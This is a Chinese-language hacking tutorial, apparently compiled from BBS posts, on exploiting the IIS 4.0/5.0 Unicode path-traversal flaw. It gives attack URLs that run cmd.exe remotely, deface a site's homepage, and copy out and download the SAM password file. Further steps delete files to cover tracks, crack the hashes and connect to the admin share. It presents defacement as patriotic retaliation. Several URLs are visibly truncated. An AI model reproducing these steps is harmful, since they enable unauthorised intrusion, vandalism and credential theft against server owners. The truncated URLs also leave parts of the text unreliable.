最近这些日子好多的WINNT的服务器被黑，尤其是国内的。下面是一些具体示例的总结。
下面这类型的漏洞以发现近一年多了，一年多前在国外的黑客网站就有了类似的文章，但
是当时 并没有很多人重视。,在反北约的黑客战中有很多就是用下面这些例子了。
不过直到UNICOUDE漏洞的发现，黑NT的计算机变的傻瓜化了。下面我把最近的一些文章总
结一下。
希望大家能从这里体会到点什么。（下面的文章来自一些邮件列表和BBS）


原理：(其实原来都很相似，我拿这个做个例子。)

NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，
导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode
字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执
行某些web根目录以外的文件。
对于IIS 5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"
或者"%c0%hh",它会首先将其解码变成:0xc10xhh， 然后尝试打开这个文件，Windows 系统
认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果 0x00<= %hh < 0x40的话，
采用的 解码的格式与下面的格式类似：
%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
因此，利用这种编码，我们可以构造很多字符，例如:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。
(1) 如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能
列出当前目录的内容：
http://www.victim.com/scripts/..%c1.../cmd.exe?/c+dir
(2) 利用这个漏洞查看系统文件内容也是可能的：
http://www.victim.com/a.asp/..%c1%1..../winnt/win.ini
Rain Forest Puppy 测试发现对于英文版的IIS 4.0/5.0,此问题同样
存在，只是编码格式略有不同，变成"%c0%af"或者"%c1%9c".
下面我们的例子以%c1%1c为主讲解。
注:+号可以用%20代替,依这种格式你还可以构造出许多命令
好多站点\inetpub\下的scripts目录删除了，
但\Program Files\Common Files\System\下
的msadc还在（有msadcs.dll漏洞的话就不用
%c1%1c了）。这时可以如下构造请求：
http://ip/msadc/..%c1%1c../..%c1%1c....exe?/c+dir+c:\


实践一：（修改主页----最简单化的一种）

很多入侵都以修改主页的形式表现出来，这通常有两种情况：一是表达自己的
愤慨——比如当年以美国为首的北约悍然轰炸我驻南使馆的突发事件之后，国内很多黑客
在ICQ、BBS一呼百应，纷纷对敌国进行各种形式的攻击，当然以替换主页最为大快人心！
二是在给网管发e-mail漏洞报告之后没反应，有的黑客按耐不住，就用修改主页的方式给
予警告， 用以引起人们对于安全技术的重视。当然说起来这是违法的啦，所以大家要注意
哦，不要光图一时的痛快， 呵呵！
可以使用ECHO命令、管道符等建立文件，修改文件内容。但因为IIS加载程序检测到有
CMD.EXE或者COMMAND.COM串就要检测特殊字符“&|(,;%<>”，如果发现有这些字符就会返
回500错误，所以不能直接使用CMD.EEX加管道符等。因此可以采用拷贝CMD.EXE换名的方法
绕过去。
http://xxx.xxx.xxx.xxx/scripts/..%c...scripts\ccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc....ked+by+chinese+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/ccc....+echo+1/1/2001+>>+f:\wwwroot\xxx\default.asp
就改了主页了！
这种方法对于有负载均衡的主机很不方便，又需要几次才能完成，所以不好。袁哥给出了
另一种更方便的办法。参考袁哥（yuange）的帖子《IIS不用拷贝CMD.EXE使用管道符等的方
法》，可以这样：
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+Hacked+by+
hacker+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/..%c...nt/system32/cmd".exe?/c+echo+12/1/2k+>>+
f:\wwwroot\xxx\default.asp
这样，主页就被更改成了：
Hacked by hacker
12/1/2k
当然我是没有这样做啦，不过这些东西我都在自己配置的环境下实现了，

在我练习的过程中发现，用ECHO写这些的时候很慢，如果你多次回车，过一阵屏幕刷新后
主页上就会留下多个你要写的内容。




实践二（下载SAM文件）

http://xxx.xxx.xxx.xxx/scripts/..%c.../winnt/system32
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件，
执行： http://xxx.xxx.xxx.xxx/scripts/..Á;../winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制，
执行：http://xxx.xxx.xxx.xxx/scripts/..%c...winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除，哇！太利害了。
随便浏览了一下，因为是国内的主机，不想搞破坏，只想练练手！目的：
获得Administrator权限。
执行：http://xxx.xxx.xxx.xxx/scripts/..%c...winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
把sam._文件拷贝到wwwroot文件内，输入：http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地，执行：
http://xxx.xxx.xxx.xxx/scripts/..%c...em32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行：C:>expand sam._ sam
启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载），Import Sam
File... 导入sam文件，Open Wordlist File...
打开一个字典，Run Crack，乖乖，要17个小时，不管它，让它慢慢破去，先睡个
觉先！五分钟后来一看，Administrator 的 Nt Password 居然是 123456，我昏，
网管们注意了，这种密码也可以取呀？执行：C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机，发现管理员ID是：asdfghjk,执行：C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghj